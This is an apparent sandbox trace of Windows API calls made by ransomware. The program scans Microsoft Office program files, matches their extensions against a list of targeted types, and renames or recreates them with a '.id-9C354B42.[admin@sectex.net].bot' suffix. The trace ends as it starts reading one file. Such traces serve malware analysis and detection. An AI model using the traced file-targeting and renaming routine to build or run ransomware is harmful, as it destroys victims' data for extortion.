	[0159.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBSHARE.DLL") returned 54
	[0159.389] lstrlenW (lpString=".1cd") returned 4
	[0159.389] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBSHARE.DLL") returned 54
	[0159.389] lstrlenW (lpString=".jpg") returned 4
	[0159.389] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBSHARE.DLL") returned 54
	[0159.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBSHARE.DLL") returned 54
	[0159.389] lstrlenW (lpString=".doc") returned 4
	[0159.389] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.389] lstrlenW (lpString=".docx") returned 5
	[0159.389] lstrcmpiW (lpString1=".docx", lpString2="E.DLL") returned -1
	[0159.389] lstrlenW (lpString=".pdf") returned 4
	[0159.389] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.389] lstrlenW (lpString=".xls") returned 4
	[0159.390] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.390] lstrlenW (lpString=".xlsx") returned 5
	[0159.390] lstrcmpiW (lpString1=".xlsx", lpString2="E.DLL") returned -1
	[0159.390] lstrlenW (lpString=".ppt") returned 4
	[0159.390] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBSHARE.DLL") returned 54
	[0159.390] lstrlenW (lpString=".zip") returned 4
	[0159.390] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.390] lstrlenW (lpString=".rar") returned 4
	[0159.390] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.390] lstrlenW (lpString=".bz2") returned 4
	[0159.390] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.390] lstrlenW (lpString=".7z") returned 3
	[0159.390] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBSHARE.DLL") returned 54
	[0159.390] lstrlenW (lpString=".dbf") returned 4
	[0159.390] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBSHARE.DLL") returned 54
	[0159.390] lstrlenW (lpString=".1cd") returned 4
	[0159.390] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBSHARE.DLL") returned 54
	[0159.390] lstrlenW (lpString=".jpg") returned 4
	[0159.390] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.390] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.390] lstrlenW (lpString="DBWIZ.DLL") returned 9
	[0159.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DBWIZ.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\dbwiz.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.391] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1276776) returned 1
	[0159.391] CloseHandle (hObject=0x1b4) returned 1
	[0159.391] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DBWIZ.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\dbwiz.dll")) returned 0x20
	[0159.391] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DBWIZ.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\dbwiz.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DBWIZ.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\dbwiz.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBWIZ.DLL") returned 52
	[0159.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBWIZ.DLL") returned 52
	[0159.392] lstrlenW (lpString=".doc") returned 4
	[0159.392] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.392] lstrlenW (lpString=".docx") returned 5
	[0159.392] lstrcmpiW (lpString1=".docx", lpString2="Z.DLL") returned -1
	[0159.392] lstrlenW (lpString=".pdf") returned 4
	[0159.392] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.392] lstrlenW (lpString=".xls") returned 4
	[0159.392] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.392] lstrlenW (lpString=".xlsx") returned 5
	[0159.392] lstrcmpiW (lpString1=".xlsx", lpString2="Z.DLL") returned -1
	[0159.392] lstrlenW (lpString=".ppt") returned 4
	[0159.392] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBWIZ.DLL") returned 52
	[0159.392] lstrlenW (lpString=".zip") returned 4
	[0159.392] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.392] lstrlenW (lpString=".rar") returned 4
	[0159.392] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.392] lstrlenW (lpString=".bz2") returned 4
	[0159.392] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.392] lstrlenW (lpString=".7z") returned 3
	[0159.392] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBWIZ.DLL") returned 52
	[0159.392] lstrlenW (lpString=".dbf") returned 4
	[0159.393] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBWIZ.DLL") returned 52
	[0159.393] lstrlenW (lpString=".1cd") returned 4
	[0159.393] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBWIZ.DLL") returned 52
	[0159.393] lstrlenW (lpString=".jpg") returned 4
	[0159.393] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBWIZ.DLL") returned 52
	[0159.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBWIZ.DLL") returned 52
	[0159.393] lstrlenW (lpString=".doc") returned 4
	[0159.393] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.393] lstrlenW (lpString=".docx") returned 5
	[0159.393] lstrcmpiW (lpString1=".docx", lpString2="Z.DLL") returned -1
	[0159.393] lstrlenW (lpString=".pdf") returned 4
	[0159.393] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.393] lstrlenW (lpString=".xls") returned 4
	[0159.393] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.393] lstrlenW (lpString=".xlsx") returned 5
	[0159.393] lstrcmpiW (lpString1=".xlsx", lpString2="Z.DLL") returned -1
	[0159.393] lstrlenW (lpString=".ppt") returned 4
	[0159.393] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBWIZ.DLL") returned 52
	[0159.393] lstrlenW (lpString=".zip") returned 4
	[0159.393] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.393] lstrlenW (lpString=".rar") returned 4
	[0159.393] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.393] lstrlenW (lpString=".bz2") returned 4
	[0159.393] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.393] lstrlenW (lpString=".7z") returned 3
	[0159.394] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBWIZ.DLL") returned 52
	[0159.394] lstrlenW (lpString=".dbf") returned 4
	[0159.394] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBWIZ.DLL") returned 52
	[0159.394] lstrlenW (lpString=".1cd") returned 4
	[0159.394] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DBWIZ.DLL") returned 52
	[0159.394] lstrlenW (lpString=".jpg") returned 4
	[0159.394] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.394] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.394] lstrlenW (lpString="DGRMLNCH.DLL") returned 12
	[0159.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DGRMLNCH.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\dgrmlnch.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.395] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=108904) returned 1
	[0159.395] CloseHandle (hObject=0x1b4) returned 1
	[0159.395] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DGRMLNCH.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\dgrmlnch.dll")) returned 0x20
	[0159.395] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DGRMLNCH.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\dgrmlnch.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DGRMLNCH.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\dgrmlnch.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DGRMLNCH.DLL") returned 55
	[0159.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DGRMLNCH.DLL") returned 55
	[0159.396] lstrlenW (lpString=".doc") returned 4
	[0159.396] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.396] lstrlenW (lpString=".docx") returned 5
	[0159.396] lstrcmpiW (lpString1=".docx", lpString2="H.DLL") returned -1
	[0159.396] lstrlenW (lpString=".pdf") returned 4
	[0159.396] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.396] lstrlenW (lpString=".xls") returned 4
	[0159.396] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.396] lstrlenW (lpString=".xlsx") returned 5
	[0159.396] lstrcmpiW (lpString1=".xlsx", lpString2="H.DLL") returned -1
	[0159.396] lstrlenW (lpString=".ppt") returned 4
	[0159.396] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DGRMLNCH.DLL") returned 55
	[0159.396] lstrlenW (lpString=".zip") returned 4
	[0159.396] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.396] lstrlenW (lpString=".rar") returned 4
	[0159.396] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.396] lstrlenW (lpString=".bz2") returned 4
	[0159.396] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.396] lstrlenW (lpString=".7z") returned 3
	[0159.396] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DGRMLNCH.DLL") returned 55
	[0159.396] lstrlenW (lpString=".dbf") returned 4
	[0159.396] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.398] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\DRILLDWN.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\drilldwn.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\DRILLDWN.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\drilldwn.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0159.494] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DWGCNV.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\dwgcnv.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DWGCNV.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\dwgcnv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.515] lstrcmpiW (lpString1=".EXE", lpString2=".bot") returned 1
	[0159.610] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=199016) returned 1
	[0159.610] CloseHandle (hObject=0x37c) returned 1
	[0159.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EDITOR.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\editor.exe")) returned 0x20
	[0159.654] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EDITOR.EXE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\editor.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EDITOR.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\editor.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITOR.EXE") returned 53
	[0159.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITOR.EXE") returned 53
	[0159.670] lstrlenW (lpString=".doc") returned 4
	[0159.670] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0159.670] lstrlenW (lpString=".docx") returned 5
	[0159.670] lstrcmpiW (lpString1=".docx", lpString2="R.EXE") returned -1
	[0159.682] lstrlenW (lpString=".pdf") returned 4
	[0159.682] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0159.682] lstrlenW (lpString=".xls") returned 4
	[0159.682] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0159.682] lstrlenW (lpString=".xlsx") returned 5
	[0159.682] lstrcmpiW (lpString1=".xlsx", lpString2="R.EXE") returned -1
	[0159.682] lstrlenW (lpString=".ppt") returned 4
	[0159.683] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0159.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITOR.EXE") returned 53
	[0159.689] lstrlenW (lpString=".zip") returned 4
	[0159.689] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0159.689] lstrlenW (lpString=".rar") returned 4
	[0159.689] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0159.689] lstrlenW (lpString=".bz2") returned 4
	[0159.689] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0159.689] lstrlenW (lpString=".7z") returned 3
	[0159.689] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0159.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITOR.EXE") returned 53
	[0159.689] lstrlenW (lpString=".dbf") returned 4
	[0159.689] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0159.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITOR.EXE") returned 53
	[0159.689] lstrlenW (lpString=".1cd") returned 4
	[0159.689] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0159.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITOR.EXE") returned 53
	[0159.689] lstrlenW (lpString=".jpg") returned 4
	[0159.689] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0159.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITOR.EXE") returned 53
	[0159.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITOR.EXE") returned 53
	[0159.689] lstrlenW (lpString=".doc") returned 4
	[0159.689] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0159.689] lstrlenW (lpString=".docx") returned 5
	[0159.690] lstrcmpiW (lpString1=".docx", lpString2="R.EXE") returned -1
	[0159.690] lstrlenW (lpString=".pdf") returned 4
	[0159.690] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0159.690] lstrlenW (lpString=".xls") returned 4
	[0159.690] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0159.690] lstrlenW (lpString=".xlsx") returned 5
	[0159.690] lstrcmpiW (lpString1=".xlsx", lpString2="R.EXE") returned -1
	[0159.690] lstrlenW (lpString=".ppt") returned 4
	[0159.690] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0159.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITOR.EXE") returned 53
	[0159.690] lstrlenW (lpString=".zip") returned 4
	[0159.690] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0159.690] lstrlenW (lpString=".rar") returned 4
	[0159.690] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0159.690] lstrlenW (lpString=".bz2") returned 4
	[0159.690] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0159.690] lstrlenW (lpString=".7z") returned 3
	[0159.690] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0159.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITOR.EXE") returned 53
	[0159.690] lstrlenW (lpString=".dbf") returned 4
	[0159.690] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0159.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITOR.EXE") returned 53
	[0159.690] lstrlenW (lpString=".1cd") returned 4
	[0159.690] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0159.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITOR.EXE") returned 53
	[0159.690] lstrlenW (lpString=".jpg") returned 4
	[0159.690] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0159.691] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0159.691] lstrlenW (lpString="EntityDataHandler.dll") returned 21
	[0159.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EntityDataHandler.dll" (normalized: "c:\\program files\\microsoft office\\office14\\entitydatahandler.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.712] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=62336) returned 1
	[0159.712] CloseHandle (hObject=0x1b4) returned 1
	[0159.713] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EntityDataHandler.dll" (normalized: "c:\\program files\\microsoft office\\office14\\entitydatahandler.dll")) returned 0x20
	[0159.787] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EntityDataHandler.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\entitydatahandler.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.928] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EntityDataHandler.dll" (normalized: "c:\\program files\\microsoft office\\office14\\entitydatahandler.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityDataHandler.dll") returned 64
	[0159.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityDataHandler.dll") returned 64
	[0159.949] lstrlenW (lpString=".doc") returned 4
	[0159.949] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0159.949] lstrlenW (lpString=".docx") returned 5
	[0159.950] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1
	[0159.950] lstrlenW (lpString=".pdf") returned 4
	[0159.950] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0159.950] lstrlenW (lpString=".xls") returned 4
	[0159.950] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0159.950] lstrlenW (lpString=".xlsx") returned 5
	[0159.950] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1
	[0159.950] lstrlenW (lpString=".ppt") returned 4
	[0159.950] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0159.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityDataHandler.dll") returned 64
	[0159.950] lstrlenW (lpString=".zip") returned 4
	[0159.950] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0159.950] lstrlenW (lpString=".rar") returned 4
	[0159.950] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0159.950] lstrlenW (lpString=".bz2") returned 4
	[0159.950] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0159.950] lstrlenW (lpString=".7z") returned 3
	[0159.950] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0159.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityDataHandler.dll") returned 64
	[0159.950] lstrlenW (lpString=".dbf") returned 4
	[0159.950] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0159.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityDataHandler.dll") returned 64
	[0159.950] lstrlenW (lpString=".1cd") returned 4
	[0159.950] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0159.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityDataHandler.dll") returned 64
	[0159.950] lstrlenW (lpString=".jpg") returned 4
	[0159.950] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0159.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityDataHandler.dll") returned 64
	[0159.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityDataHandler.dll") returned 64
	[0159.950] lstrlenW (lpString=".doc") returned 4
	[0159.951] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0159.951] lstrlenW (lpString=".docx") returned 5
	[0159.951] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1
	[0159.951] lstrlenW (lpString=".pdf") returned 4
	[0159.951] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0159.951] lstrlenW (lpString=".xls") returned 4
	[0159.951] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0159.951] lstrlenW (lpString=".xlsx") returned 5
	[0159.951] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1
	[0159.951] lstrlenW (lpString=".ppt") returned 4
	[0159.951] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0159.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityDataHandler.dll") returned 64
	[0159.951] lstrlenW (lpString=".zip") returned 4
	[0159.951] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0159.951] lstrlenW (lpString=".rar") returned 4
	[0159.951] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0159.951] lstrlenW (lpString=".bz2") returned 4
	[0159.951] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0159.951] lstrlenW (lpString=".7z") returned 3
	[0159.951] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0159.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityDataHandler.dll") returned 64
	[0159.951] lstrlenW (lpString=".dbf") returned 4
	[0159.951] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0159.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityDataHandler.dll") returned 64
	[0159.951] lstrlenW (lpString=".1cd") returned 4
	[0159.951] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0159.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EntityDataHandler.dll") returned 64
	[0159.951] lstrlenW (lpString=".jpg") returned 4
	[0159.951] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0159.952] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0159.952] lstrlenW (lpString="ACTIVITY.CFG") returned 12
	[0159.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activity.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.952] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=968) returned 1
	[0159.952] CloseHandle (hObject=0x3d0) returned 1
	[0159.952] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activity.cfg")) returned 0x20
	[0159.954] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activity.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activity.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.954] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.955] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.955] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITY.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activity.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0160.020] GetLastError () returned 0x0
	[0160.020] ReadFile (in: hFile=0x3d0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x3c8, lpOverlapped=0x0) returned 1
